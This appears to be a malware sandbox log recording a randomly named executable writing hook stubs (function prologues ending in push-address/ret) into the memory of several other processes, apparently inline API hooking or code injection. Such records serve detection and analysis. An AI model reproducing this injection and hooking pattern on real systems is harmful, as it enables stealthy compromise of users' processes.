Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 23000FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 230010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 230015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 230016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2300187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2310000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 3804 base: 2310011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EA0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EB0000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4176 base: 2EB0011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A00DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A00EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A00FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25A0187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25B0000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 4080 base: 25B0011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C2003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C2006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C2007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C2008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C200A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C200B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C200C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C200D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C200DE value: 8B FF 55 8B EC 83 EC 7C 68 48 5F 31 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C200EC value: 8B FF 55 8B EC 83 EC 60 68 A8 A1 3E 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C200FA value: 8B FF 55 8B EC 81 EC 8C 00 00 00 68 AB C5 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C2010B value: 8B FF 55 8B EC 83 E4 F8 68 88 5B 33 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20119 value: 8B FF 55 8B EC A1 98 84 DA 74 68 6A EA D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20129 value: 8B FF 55 8B EC 83 EC 14 68 A8 58 D7 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20137 value: 8B FF 55 8B EC 83 EC 10 68 F8 DF D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20145 value: 8B FF 55 8B EC 5D 68 56 EA A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20151 value: 8B FF 55 8B EC 5D 68 E6 E8 A8 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C2015D value: 8B FF 55 8B EC 8B 55 10 68 98 B3 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C2016B value: 8B FF 55 8B EC 83 EC 14 68 08 B4 C0 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20179 value: 8B FF 55 8B EC 83 EC 2C 68 08 7D BF 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: C20187 value: 8B FF 55 8B EC 6A 00 68 97 93 50 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 2680000 value: 8B FF 55 8B EC 81 EC 10 02 00 00 68 1B FF D8 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 2996 base: 2680011 value: 8B FF 55 8B EC 83 E4 F8 68 18 A8 D6 74 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0010 value: 8B FF 55 8B EC 83 E4 F8 68 88 DE ED 76 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF003A value: 8B FF 55 8B EC 5D 68 96 41 AA 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0046 value: 8B FF 55 8B EC 5D 68 66 05 A9 75 C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0052 value: 8B FF 55 8B EC 83 E4 F8 68 38 42 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0060 value: 8B FF 55 8B EC 83 EC 3C 68 78 15 41 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF006E value: 8B FF 55 8B EC 83 E4 F8 68 28 57 34 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF007C value: 8B FF 55 8B EC 83 EC 3C 68 F8 3F 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF008A value: 8B FF 55 8B EC 83 EC 54 68 58 33 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF0098 value: 8B FF 55 8B EC 83 EC 3C 68 78 87 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF00A6 value: 8B FF 55 8B EC 83 EC 3C 68 98 43 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF00B4 value: 8B FF 55 8B EC 83 EC 3C 68 48 8A 39 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF00C2 value: 8B FF 55 8B EC 83 EC 3C 68 F8 0E 38 6F C3
Source: C:\Program Files (x86)\LdeWKZazZKfvzrGtjGuLEmITNknRAgVxStdwTQWzMvzouYILHHdXru\XRdxSzSUL8yOL.exe	Memory written: PID: 1720 base: 2DF00D0 value: 8B FF 55 8B EC 83 EC 3C 68 28 AF 33 6F C3
